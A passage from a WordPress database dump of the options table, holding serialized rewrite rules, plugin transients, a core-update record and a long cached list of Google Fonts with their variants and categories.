$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:52:\"blog/author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:47:\"blog/author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:28:\"blog/author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:40:\"blog/author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:22:\"blog/author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:74:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:69:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:50:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:62:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:44:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:61:\"blog/([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:56:\"blog/([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:37:\"blog/([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:49:\"blog/([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:31:\"blog/([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:48:\"blog/([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:43:\"blog/([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:24:\"blog/([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:36:\"blog/([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:18:\"blog/([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:32:\"blog/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"blog/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"blog/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"blog/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"blog/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"blog/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:21:\"blog/([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:25:\"blog/([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:45:\"blog/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:40:\"blog/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:33:\"blog/([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:40:\"blog/([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:29:\"blog/([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:21:\"blog/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:31:\"blog/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:51:\"blog/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:46:\"blog/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:46:\"blog/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:27:\"blog/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(328398,'_cerber_report','a:2:{i:0;i:1675070066;i:1;b:0;}','no'),(341828,'_cerber_notify_new','a:1:{i:0;s:3:\"9.0\";}','no'),(389344,'user_count','1','no'),(475548,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1675194688;s:15:\"version_checked\";s:5:\"6.1.1\";s:12:\"translations\";a:0:{}}','no'),(498165,'_site_transient_timeout_cerber_hourly_1','1675213484','no'),(498166,'_site_transient_cerber_hourly_1','a:2:{i:0;i:1675206284;i:1;i:1675206284;}','no'),(498180,'_site_transient_timeout_cerber_daily_1','1675304619','no'),(498181,'_site_transient_cerber_daily_1','a:2:{i:0;i:1675131810;i:1;i:1675131819;}','no'),(503105,'_site_transient_timeout_cerber_hourly_2','1675214413','no'),(503106,'_site_transient_cerber_hourly_2','a:2:{i:0;i:1675207212;i:1;i:1675207213;}','no'),(509716,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1675242011','no'),(509717,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(514893,'_site_transient_timeout_kirki_googlefonts_cache','1675255597','no'),(514894,'_site_transient_kirki_googlefonts_cache','a:1064:{s:7:\"ABeeZee\";a:3:{s:5:\"label\";s:7:\"ABeeZee\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Abel\";a:3:{s:5:\"label\";s:4:\"Abel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Abhaya Libre\";a:3:{s:5:\"label\";s:12:\"Abhaya Libre\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Abril Fatface\";a:3:{s:5:\"label\";s:13:\"Abril Fatface\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Aclonica\";a:3:{s:5:\"label\";s:8:\"Aclonica\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Acme\";a:3:{s:5:\"label\";s:4:\"Acme\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Actor\";a:3:{s:5:\"label\";s:5:\"Actor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Adamina\";a:3:{s:5:\"label\";s:7:\"Adamina\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Advent Pro\";a:3:{s:5:\"label\";s:10:\"Advent Pro\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Aguafina Script\";a:3:{s:5:\"label\";s:15:\"Aguafina Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Akaya Kanadaka\";a:3:{s:5:\"label\";s:14:\"Akaya Kanadaka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Akaya Telivigala\";a:3:{s:5:\"label\";s:16:\"Akaya Telivigala\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Akronim\";a:3:{s:5:\"label\";s:7:\"Akronim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Aladin\";a:3:{s:5:\"label\";s:6:\"Aladin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Alata\";a:3:{s:5:\"label\";s:5:\"Alata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Alatsi\";a:3:{s:5:\"label\";s:6:\"Alatsi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Aldrich\";a:3:{s:5:\"label\";s:7:\"Aldrich\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Alef\";a:3:{s:5:\"label\";s:4:\"Alef\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Alegreya\";a:3:{s:5:\"label\";s:8:\"Alegreya\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Alegreya SC\";a:3:{s:5:\"label\";s:11:\"Alegreya SC\";s:8:\"variants\";a:10:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"800\";i:5;s:9:\"800italic\";i:6;s:3:\"900\";i:7;s:9:\"900italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Alegreya Sans\";a:3:{s:5:\"label\";s:13:\"Alegreya Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Alegreya Sans SC\";a:3:{s:5:\"label\";s:16:\"Alegreya Sans SC\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Aleo\";a:3:{s:5:\"label\";s:4:\"Aleo\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Alex Brush\";a:3:{s:5:\"label\";s:10:\"Alex Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Alfa Slab One\";a:3:{s:5:\"label\";s:13:\"Alfa Slab One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Alice\";a:3:{s:5:\"label\";s:5:\"Alice\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Alike\";a:3:{s:5:\"label\";s:5:\"Alike\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Alike Angular\";a:3:{s:5:\"label\";s:13:\"Alike Angular\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Allan\";a:3:{s:5:\"label\";s:5:\"Allan\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Allerta\";a:3:{s:5:\"label\";s:7:\"Allerta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Allerta Stencil\";a:3:{s:5:\"label\";s:15:\"Allerta Stencil\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Allura\";a:3:{s:5:\"label\";s:6:\"Allura\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Almarai\";a:3:{s:5:\"label\";s:7:\"Almarai\";s:8:\"variants\";a:4:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:3:\"800\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Almendra\";a:3:{s:5:\"label\";s:8:\"Almendra\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Almendra Display\";a:3:{s:5:\"label\";s:16:\"Almendra Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Almendra SC\";a:3:{s:5:\"label\";s:11:\"Almendra SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Amarante\";a:3:{s:5:\"label\";s:8:\"Amarante\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Amaranth\";a:3:{s:5:\"label\";s:8:\"Amaranth\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Amatic SC\";a:3:{s:5:\"label\";s:9:\"Amatic SC\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Amethysta\";a:3:{s:5:\"label\";s:9:\"Amethysta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Amiko\";a:3:{s:5:\"label\";s:5:\"Amiko\";s:8:\"variants\";a:3:{i:0;s:3:\"600\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Amiri\";a:3:{s:5:\"label\";s:5:\"Amiri\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Amita\";a:3:{s:5:\"label\";s:5:\"Amita\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Anaheim\";a:3:{s:5:\"label\";s:7:\"Anaheim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Andada\";a:3:{s:5:\"label\";s:6:\"Andada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Andika\";a:3:{s:5:\"label\";s:6:\"Andika\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Andika New Basic\";a:3:{s:5:\"label\";s:16:\"Andika New Basic\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Angkor\";a:3:{s:5:\"label\";s:6:\"Angkor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:24:\"Annie Use Your Telescope\";a:3:{s:5:\"label\";s:24:\"Annie Use Your Telescope\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Anonymous Pro\";a:3:{s:5:\"label\";s:13:\"Anonymous Pro\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:5:\"Antic\";a:3:{s:5:\"label\";s:5:\"Antic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Antic Didone\";a:3:{s:5:\"label\";s:12:\"Antic Didone\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Antic Slab\";a:3:{s:5:\"label\";s:10:\"Antic Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Anton\";a:3:{s:5:\"label\";s:5:\"Anton\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Antonio\";a:3:{s:5:\"label\";s:7:\"Antonio\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Arapey\";a:3:{s:5:\"label\";s:6:\"Arapey\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Arbutus\";a:3:{s:5:\"label\";s:7:\"Arbutus\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Arbutus Slab\";a:3:{s:5:\"label\";s:12:\"Arbutus Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Architects Daughter\";a:3:{s:5:\"label\";s:19:\"Architects Daughter\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Archivo\";a:3:{s:5:\"label\";s:7:\"Archivo\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Archivo Black\";a:3:{s:5:\"label\";s:13:\"Archivo Black\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Archivo Narrow\";a:3:{s:5:\"label\";s:14:\"Archivo Narrow\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Aref Ruqaa\";a:3:{s:5:\"label\";s:10:\"Aref Ruqaa\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Arima Madurai\";a:3:{s:5:\"label\";s:13:\"Arima Madurai\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Arimo\";a:3:{s:5:\"label\";s:5:\"Arimo\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Arizonia\";a:3:{s:5:\"label\";s:8:\"Arizonia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Armata\";a:3:{s:5:\"label\";s:6:\"Armata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Arsenal\";a:3:{s:5:\"label\";s:7:\"Arsenal\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Artifika\";a:3:{s:5:\"label\";s:8:\"Artifika\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Arvo\";a:3:{s:5:\"label\";s:4:\"Arvo\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Arya\";a:3:{s:5:\"label\";s:4:\"Arya\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Asap\";a:3:{s:5:\"label\";s:4:\"Asap\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Asap Condensed\";a:3:{s:5:\"label\";s:14:\"Asap Condensed\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Asar\";a:3:{s:5:\"label\";s:4:\"Asar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Asset\";a:3:{s:5:\"label\";s:5:\"Asset\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Assistant\";a:3:{s:5:\"label\";s:9:\"Assistant\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Astloch\";a:3:{s:5:\"label\";s:7:\"Astloch\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Asul\";a:3:{s:5:\"label\";s:4:\"Asul\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Athiti\";a:3:{s:5:\"label\";s:6:\"Athiti\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Atma\";a:3:{s:5:\"label\";s:4:\"Atma\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Atomic Age\";a:3:{s:5:\"label\";s:10:\"Atomic Age\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Aubrey\";a:3:{s:5:\"label\";s:6:\"Aubrey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Audiowide\";a:3:{s:5:\"label\";s:9:\"Audiowide\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Autour One\";a:3:{s:5:\"label\";s:10:\"Autour One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Average\";a:3:{s:5:\"label\";s:7:\"Average\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Average Sans\";a:3:{s:5:\"label\";s:12:\"Average 